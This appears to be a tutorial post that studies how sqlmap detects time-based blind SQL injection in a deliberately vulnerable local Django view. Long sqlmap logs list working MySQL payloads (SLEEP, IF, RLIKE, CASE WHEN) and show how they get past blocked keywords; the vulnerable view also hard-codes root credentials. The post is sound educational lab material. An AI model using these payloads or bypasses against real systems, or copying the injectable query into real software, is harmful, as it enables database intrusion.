How to study the injection techniques sqlmap uses

An injection target built with Django (the view below is deliberately vulnerable):

from django.http import HttpResponse
import pymysql

def te(request):
    id = request.GET.get("id")
    db = pymysql.connect(host="127.0.0.1", user="root", password="123456",
                         database="t1", charset="utf8")
    cursor = db.cursor()
    # Deliberately vulnerable: the request parameter is pasted into the SQL text.
    cursor.execute("SELECT * FROM test where id =" + id)
    data = cursor.fetchone()
    db.close()
    # When no row matches, data is None and data[1] raises, which Django turns
    # into the HTTP 500 that shows up for most payloads in the sqlmap logs below.
    return HttpResponse(data[1])
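As an added example (not code from the original post), here is the same lookup written the vulnerable way and the hardened way, side by side. An in-memory SQLite table stands in for the post's MySQL table `test`, and the sample rows and the tautology payload are constructed for the example; the hardening itself (type-validate the parameter, then bind it instead of concatenating) applies unchanged to the pymysql view above.

```python
# Added example, not part of the original post: the post's lookup written two ways,
# run against an in-memory SQLite table standing in for the MySQL table `test`
# (SQLite instead of MySQL and the sample rows are assumptions of this example).
import sqlite3


def make_db():
    """Build a throwaway table shaped like the post's `test` table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE test (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO test VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn


def lookup_unsafe(conn, raw_id):
    """Mirrors the post's view: the request parameter is pasted into the SQL text."""
    cur = conn.execute("SELECT * FROM test WHERE id = " + raw_id)
    return cur.fetchall()


def lookup_bound_string(conn, raw_id):
    """Binding alone, no type check: the whole string is compared as one value."""
    cur = conn.execute("SELECT * FROM test WHERE id = ?", (raw_id,))
    return cur.fetchall()


def lookup_safe(conn, raw_id):
    """Hardened form: validate the type first, then bind the value as a parameter."""
    try:
        id_value = int(raw_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    cur = conn.execute("SELECT * FROM test WHERE id = ?", (id_value,))
    return cur.fetchall()


def is_rejected(raw_id):
    """True when the hardened lookup refuses the value before any SQL runs."""
    try:
        lookup_safe(make_db(), raw_id)
    except ValueError:
        return True
    return False


def demo():
    """Row counts for a benign id and for a constructed tautology payload."""
    conn = make_db()
    benign = "1"
    tamper = "1 OR 1=1"  # constructed; same shape as the OR-based probes in the post
    return {
        "unsafe_benign": len(lookup_unsafe(conn, benign)),   # 1 row, as intended
        "unsafe_tamper": len(lookup_unsafe(conn, tamper)),   # every row leaks
        "bound_tamper": len(lookup_bound_string(conn, tamper)),  # compared as text: 0 rows
        "safe_benign": len(lookup_safe(conn, benign)),       # 1 row
    }


if __name__ == "__main__":
    print(demo())
    print("rejected:", is_rejected("1 OR 1=1"))
```

With parameter binding the database never parses the request value as SQL, so none of the `AND`/`OR`/`RLIKE`/`CASE`/`ELT`/`MAKE_SET` variants sqlmap rotates through later in this post have anything to attach to; the extra `int()` check turns a malformed id into a clean 4xx-style rejection instead of a query that silently matches nothing.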

Normal page (screenshot):

With a single quote appended (screenshot):

sqlmap's injection detection techniques are the following (screenshot):

Time-based blind injection (T)

Injection command:

--level 5 --risk 3 --batch --dbms=mysql -v 3 -p id --flush-session  --technique=T
[22:19:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[22:19:32] [PAYLOAD] 1) AND SLEEP(5)-- RfYH
[22:19:32] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[22:19:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:19:33] [PAYLOAD] 1) AND SLEEP(5) AND (9830=9830
[22:19:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:19:33] [PAYLOAD] 1)) AND SLEEP(5) AND ((9685=9685
[22:19:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:19:33] [PAYLOAD] 1))) AND SLEEP(5) AND (((6020=6020
[22:19:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:19:33] [PAYLOAD] 1 AND SLEEP(5)
[22:19:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:19:38] [PAYLOAD] 1 AND SLEEP(0)
[22:19:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:19:38] [PAYLOAD] 1 AND SLEEP(5)
[22:19:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:19:43] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[22:19:43] [PAYLOAD] 1 AND 6670=IF((61=61),SLEEP(5),6670)
[22:19:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:19:48] [PAYLOAD] 1 AND 6666=IF((61=78),SLEEP(5),6666)
[22:19:48] [PAYLOAD] 1 AND 4347=IF((61=99),SLEEP(5),4347)
[22:19:48] [PAYLOAD] 1 AND 4376=IF((99=78),SLEEP(5),4376)
[22:19:48] [PAYLOAD] 1 AND 3045=IF((78=78),SLEEP(5),3045)
[22:19:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:19:53] [PAYLOAD] 1 AND 7064=IF((99 78),SLEEP(5),7064)
[22:19:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:19:53] [PAYLOAD] 1 AND 4629=IF((16=16),SLEEP(5),4629)
[22:19:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:19:58] [PAYLOAD] 1 AND 5264=IF((16=40),SLEEP(5),5264)
[22:19:58] [PAYLOAD] 1 AND 6070=IF((16=93),SLEEP(5),6070)
[22:19:58] [PAYLOAD] 1 AND 7543=IF((93=40),SLEEP(5),7543)
[22:19:58] [PAYLOAD] 1 AND 3147=IF((40=40),SLEEP(5),3147)
[22:20:03] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:20:04] [PAYLOAD] 1 AND 8849=IF((93 40),SLEEP(5),8849)
[22:20:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:20:04] [PAYLOAD] 1 AND 8037=IF((11=11),SLEEP(5),8037)
[22:20:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:20:09] [PAYLOAD] 1 AND 1374=IF((11=19),SLEEP(5),1374)
[22:20:09] [PAYLOAD] 1 AND 7006=IF((11=55),SLEEP(5),7006)
[22:20:09] [PAYLOAD] 1 AND 9634=IF((55=19),SLEEP(5),9634)
[22:20:09] [PAYLOAD] 1 AND 9001=IF((19=19),SLEEP(5),9001)
[22:20:14] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:20:14] [PAYLOAD] 1 AND 8633=IF((55 19),SLEEP(5),8633)
[22:20:14] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:20:14] [PAYLOAD] 1 AND 3268=IF((39=39),SLEEP(5),3268)
[22:20:19] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:20:19] [PAYLOAD] 1 AND 8941=IF((39=95),SLEEP(5),8941)
[22:20:19] [PAYLOAD] 1 AND 8749=IF((39=99),SLEEP(5),8749)
[22:20:19] [PAYLOAD] 1 AND 3479=IF((99=95),SLEEP(5),3479)
[22:20:19] [PAYLOAD] 1 AND 7395=IF((95=95),SLEEP(5),7395)
[22:20:24] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:20:24] [PAYLOAD] 1 AND 7236=IF((99 95),SLEEP(5),7236)
[22:20:24] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:20:24] [PAYLOAD] 1 AND 2647=IF((16=16),SLEEP(5),2647)
[22:20:29] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:20:29] [PAYLOAD] 1 AND 1648=IF((16=18),SLEEP(5),1648)
[22:20:29] [PAYLOAD] 1 AND 9955=IF((16=72),SLEEP(5),9955)
[22:20:29] [PAYLOAD] 1 AND 5891=IF((72=18),SLEEP(5),5891)
[22:20:29] [PAYLOAD] 1 AND 2035=IF((18=18),SLEEP(5),2035)
[22:20:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:20:34] [PAYLOAD] 1 AND 9912=IF((72 18),SLEEP(5),9912)
[22:20:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:20:34] [DEBUG] checking for parameter length constrainting mechanisms
[22:20:34] [PAYLOAD] 1 AND 7575=IF((4938=[... long run of spaces trimmed ...]4938),SLEEP(5),7575)
[22:20:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:20:39] [DEBUG] checking for filtered characters
[22:20:39] [PAYLOAD] 1 AND 3720=IF((5937>5936),SLEEP(5),3720)
[22:20:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[22:20:44] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 67 HTTP(s) requests:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[22:20:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

With this payload sqlmap tests whether the IF function can be used. If the condition holds, SLEEP(5) runs and the response is delayed by 5 seconds (SLEEP returns 0 once it finishes, so 6670=0 is false); otherwise IF returns 6670, and since 6670 equals the outer 6670 the comparison evaluates to 1 and the original WHERE clause is left intact. The entries of the form IF((99 78),...) with no operator between the numbers are part of sqlmap's false-positive check: a deliberately malformed comparison that a real database must reject with an error.

Suppose I block the string AND.

sqlmap then switches to OR on its own.

When OR + SLEEP(5) is used, the sleep is not executed:

[22:35:43] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[22:35:43] [PAYLOAD] 1) OR SLEEP(5)#
[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:43] [PAYLOAD] 1)) OR SLEEP(5)#
[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:43] [PAYLOAD] 1))) OR SLEEP(5)#
[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:43] [PAYLOAD] 1 OR SLEEP(5)#
[22:35:43] [PAYLOAD] 1) WHERE 1129=1129 OR SLEEP(5)#
[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:43] [PAYLOAD] 1 WHERE 5039=5039 OR SLEEP(5)#
[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:43] [PAYLOAD] 1)) AS aXdd WHERE 6537=6537 OR SLEEP(5)#
[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:43] [PAYLOAD] 1) AS yosm WHERE 7331=7331 OR SLEEP(5)#
[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:43] [PAYLOAD] 1` WHERE 3927=3927 OR SLEEP(5)#
[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:43] [PAYLOAD] 1`) WHERE 9536=9536 OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1') OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1' OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1" OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1')) OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1'))) OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1") OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1")) OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1"))) OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1%') OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1%')) OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1%'))) OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1%' OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1%") OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1%")) OR SLEEP(5)#
[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:44] [PAYLOAD] 1%"))) OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:45] [PAYLOAD] 1%" OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:45] [PAYLOAD] 1') WHERE 1477=1477 OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:45] [PAYLOAD] 1") WHERE 2319=2319 OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:45] [PAYLOAD] 1' WHERE 5508=5508 OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:45] [PAYLOAD] 1" WHERE 9299=9299 OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:45] [PAYLOAD] 1'||(SELECT 'gxbY' FROM DUAL WHERE 3409=3409 OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:45] [PAYLOAD] 1'||(SELECT 'XQiD' WHERE 6808=6808 OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:45] [PAYLOAD] 1'+(SELECT MsiW WHERE 5089=5089 OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:45] [PAYLOAD] 1'+(SELECT 'tHYQ' WHERE 6487=6487 OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:45] [PAYLOAD] 1')) AS EeuT WHERE 2138=2138 OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:45] [PAYLOAD] 1")) AS zUfI WHERE 4750=4750 OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:45] [PAYLOAD] 1') AS NSxT WHERE 1030=1030 OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:35:45] [PAYLOAD] 1") AS jGtE WHERE 8551=8551 OR SLEEP(5)#
[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)

so it switches to this mode:

[22:35:56] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[22:35:56] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(37=37,0,5)))))Drzz)
[22:36:01] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(37=62,0,5)))))uxWh)
[22:36:01] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(37=75,0,5)))))gkcr)
[22:36:01] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(75=62,0,5)))))HftH)
[22:36:01] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(62=62,0,5)))))PEif)
[22:36:06] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(75 62,0,5)))))rIqx)
[22:36:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:36:06] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(41=41,0,5)))))AiYm)
[22:36:11] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(41=48,0,5)))))ksnP)
[22:36:11] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(41=60,0,5)))))hfID)
[22:36:11] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(60=48,0,5)))))FdQf)
[22:36:11] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(48=48,0,5)))))sOgu)
[22:36:16] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(60 48,0,5)))))nQeP)
[22:36:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:36:16] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(12=12,0,5)))))BobY)
[22:36:21] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(12=39,0,5)))))Vnya)
[22:36:22] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(12=90,0,5)))))dioX)
[22:36:22] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(90=39,0,5)))))uINL)
[22:36:22] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=39,0,5)))))UhqQ)
[22:36:27] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(90 39,0,5)))))aHQG)
[22:36:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:36:27] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=39,0,5)))))BVgV)
[22:36:32] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=57,0,5)))))uDwn)
[22:36:32] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=72,0,5)))))OtdM)
[22:36:32] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(72=57,0,5)))))XExQ)
[22:36:32] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(57=57,0,5)))))MeGs)
[22:36:37] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(72 57,0,5)))))USnO)
[22:36:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:36:37] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(38=38,0,5)))))kNFY)
[22:36:42] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(38=39,0,5)))))LZUq)
[22:36:42] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(38=62,0,5)))))CbGw)
[22:36:42] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(62=39,0,5)))))fatr)
[22:36:42] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=39,0,5)))))wnqf)
[22:36:47] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(62 39,0,5)))))vOsj)
[22:36:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:36:47] [DEBUG] checking for parameter length constrainting mechanisms
[22:36:47] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(2557=

The sleep succeeds.

The SLEEP call is wrapped in a subquery that is used as a table (a derived table); the trailing Drzz is the alias MySQL requires for it. The delay is 5-(IF(37=37,0,5)): when the comparison is true, IF yields 0 and SLEEP(5) runs for 5 seconds; when it is false, IF yields 5 and SLEEP(0) returns at once.

1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(37=37,0,5)))))Drzz)

If the blocked strings are AND and IF, it fails.

If the blocked strings are AND and OR:

In MySQL, the RLIKE operator determines whether a string matches a regular expression. It is a synonym for REGEXP_LIKE(). The result is 1 if the string matches the given regular expression and 0 otherwise.
[22:59:15] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[22:59:15] [PAYLOAD] 1 RLIKE (SELECT 6936=IF((30=30),SLEEP(5),6936))
[22:59:20] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:59:21] [PAYLOAD] 1 RLIKE (SELECT 1879=IF((30=59),SLEEP(5),1879))
[22:59:21] [PAYLOAD] 1 RLIKE (SELECT 4259=IF((30=79),SLEEP(5),4259))
[22:59:21] [PAYLOAD] 1 RLIKE (SELECT 1368=IF((79=59),SLEEP(5),1368))
[22:59:22] [PAYLOAD] 1 RLIKE (SELECT 2671=IF((59=59),SLEEP(5),2671))
[22:59:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:59:27] [PAYLOAD] 1 RLIKE (SELECT 6464=IF((79 59),SLEEP(5),6464))
[22:59:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:59:27] [PAYLOAD] 1 RLIKE (SELECT 8940=IF((34=34),SLEEP(5),8940))
[22:59:32] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:59:32] [PAYLOAD] 1 RLIKE (SELECT 4099=IF((34=69),SLEEP(5),4099))
[22:59:32] [PAYLOAD] 1 RLIKE (SELECT 4609=IF((34=85),SLEEP(5),4609))
[22:59:32] [PAYLOAD] 1 RLIKE (SELECT 5560=IF((85=69),SLEEP(5),5560))
[22:59:32] [PAYLOAD] 1 RLIKE (SELECT 8957=IF((69=69),SLEEP(5),8957))
[22:59:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:59:37] [PAYLOAD] 1 RLIKE (SELECT 2173=IF((85 69),SLEEP(5),2173))
[22:59:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:59:37] [PAYLOAD] 1 RLIKE (SELECT 1282=IF((27=27),SLEEP(5),1282))
[22:59:42] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:59:42] [PAYLOAD] 1 RLIKE (SELECT 7694=IF((27=77),SLEEP(5),7694))
[22:59:42] [PAYLOAD] 1 RLIKE (SELECT 6583=IF((27=93),SLEEP(5),6583))
[22:59:42] [PAYLOAD] 1 RLIKE (SELECT 9747=IF((93=77),SLEEP(5),9747))
[22:59:42] [PAYLOAD] 1 RLIKE (SELECT 9719=IF((77=77),SLEEP(5),9719))
[22:59:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:59:47] [PAYLOAD] 1 RLIKE (SELECT 6903=IF((93 77),SLEEP(5),6903))
[22:59:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:59:47] [PAYLOAD] 1 RLIKE (SELECT 2802=IF((29=29),SLEEP(5),2802))
[22:59:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:59:52] [PAYLOAD] 1 RLIKE (SELECT 8059=IF((29=44),SLEEP(5),8059))
[22:59:52] [PAYLOAD] 1 RLIKE (SELECT 5050=IF((29=69),SLEEP(5),5050))
[22:59:52] [PAYLOAD] 1 RLIKE (SELECT 6203=IF((69=44),SLEEP(5),6203))
[22:59:52] [PAYLOAD] 1 RLIKE (SELECT 6233=IF((44=44),SLEEP(5),6233))
[22:59:57] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:59:57] [PAYLOAD] 1 RLIKE (SELECT 2840=IF((69 44),SLEEP(5),2840))
[22:59:57] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[22:59:57] [PAYLOAD] 1 RLIKE (SELECT 5151=IF((32=32),SLEEP(5),5151))
[23:00:02] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:00:02] [PAYLOAD] 1 RLIKE (SELECT 9793=IF((32=71),SLEEP(5),9793))
[23:00:02] [PAYLOAD] 1 RLIKE (SELECT 6044=IF((32=83),SLEEP(5),6044))
[23:00:02] [PAYLOAD] 1 RLIKE (SELECT 6513=IF((83=71),SLEEP(5),6513))
[23:00:02] [PAYLOAD] 1 RLIKE (SELECT 7971=IF((71=71),SLEEP(5),7971))
[23:00:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:00:07] [PAYLOAD] 1 RLIKE (SELECT 3576=IF((83 71),SLEEP(5),3576))
[23:00:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:00:08] [DEBUG] checking for parameter length constrainting mechanisms
[23:00:08] [PAYLOAD] 1 RLIKE (SELECT 4796=IF((9305=[... long run of spaces trimmed ...]9305),SLEEP(5),4796))
[23:00:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:00:13] [DEBUG] checking for filtered characters
[23:00:13] [PAYLOAD] 1 RLIKE (SELECT 7423=IF((2249>2248),SLEEP(5),7423))

If the blocked strings are AND, OR and RLIKE:

The SQL CASE expression is a general conditional expression, similar to if/else in other languages:

    CASE WHEN condition THEN result
         [WHEN ...]
         [ELSE result]
    END

A CASE clause can be used anywhere an expression is valid. condition is an expression that returns a boolean. If it is true, the result of the CASE expression is the matching result. If it is false, any subsequent WHEN clauses are searched in the same way. If no WHEN condition is true, the result of the CASE expression is the value in the ELSE clause. If the ELSE clause is omitted and no condition matches, the result is NULL. The other syntax is the simple CASE form:

    CASE sex
         WHEN '1' THEN '男'
         WHEN '2' THEN '女'
         ELSE '其他'
    END

The first (searched) form is recommended; use the simple form less.
[23:03:11] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[23:03:11] [PAYLOAD] (CASE WHEN (13=13) THEN SLEEP(5) ELSE 9315 END)
[23:03:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:16] [PAYLOAD] (CASE WHEN (13=29) THEN SLEEP(5) ELSE 2370 END)
[23:03:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:16] [PAYLOAD] (CASE WHEN (13=56) THEN SLEEP(5) ELSE 9841 END)
[23:03:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:16] [PAYLOAD] (CASE WHEN (56=29) THEN SLEEP(5) ELSE 8206 END)
[23:03:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:16] [PAYLOAD] (CASE WHEN (29=29) THEN SLEEP(5) ELSE 7582 END)
[23:03:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:22] [PAYLOAD] (CASE WHEN (56 29) THEN SLEEP(5) ELSE 7064 END)
[23:03:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:22] [PAYLOAD] (CASE WHEN (52=52) THEN SLEEP(5) ELSE 1764 END)
[23:03:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:27] [PAYLOAD] (CASE WHEN (52=88) THEN SLEEP(5) ELSE 3749 END)
[23:03:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:27] [PAYLOAD] (CASE WHEN (52=95) THEN SLEEP(5) ELSE 7047 END)
[23:03:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:27] [PAYLOAD] (CASE WHEN (95=88) THEN SLEEP(5) ELSE 9320 END)
[23:03:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:27] [PAYLOAD] (CASE WHEN (88=88) THEN SLEEP(5) ELSE 7829 END)
[23:03:32] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:32] [PAYLOAD] (CASE WHEN (95 88) THEN SLEEP(5) ELSE 1663 END)
[23:03:32] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:32] [PAYLOAD] (CASE WHEN (51=51) THEN SLEEP(5) ELSE 8885 END)
[23:03:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:37] [PAYLOAD] (CASE WHEN (51=75) THEN SLEEP(5) ELSE 2713 END)
[23:03:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:37] [PAYLOAD] (CASE WHEN (51=89) THEN SLEEP(5) ELSE 2195 END)
[23:03:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:37] [PAYLOAD] (CASE WHEN (89=75) THEN SLEEP(5) ELSE 6522 END)
[23:03:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:37] [PAYLOAD] (CASE WHEN (75=75) THEN SLEEP(5) ELSE 4869 END)
[23:03:42] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:42] [PAYLOAD] (CASE WHEN (89 75) THEN SLEEP(5) ELSE 7742 END)
[23:03:42] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:42] [PAYLOAD] (CASE WHEN (52=52) THEN SLEEP(5) ELSE 7375 END)
[23:03:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:48] [PAYLOAD] (CASE WHEN (52=60) THEN SLEEP(5) ELSE 7982 END)
[23:03:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:48] [PAYLOAD] (CASE WHEN (52=85) THEN SLEEP(5) ELSE 9535 END)
[23:03:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:48] [PAYLOAD] (CASE WHEN (85=60) THEN SLEEP(5) ELSE 1355 END)
[23:03:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:48] [PAYLOAD] (CASE WHEN (60=60) THEN SLEEP(5) ELSE 6053 END)
[23:03:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:53] [PAYLOAD] (CASE WHEN (85 60) THEN SLEEP(5) ELSE 1168 END)
[23:03:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[23:03:53] [PAYLOAD] (CASE WHEN (61=61) THEN SLEEP(5) ELSE 1220 END)
[23:03:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)
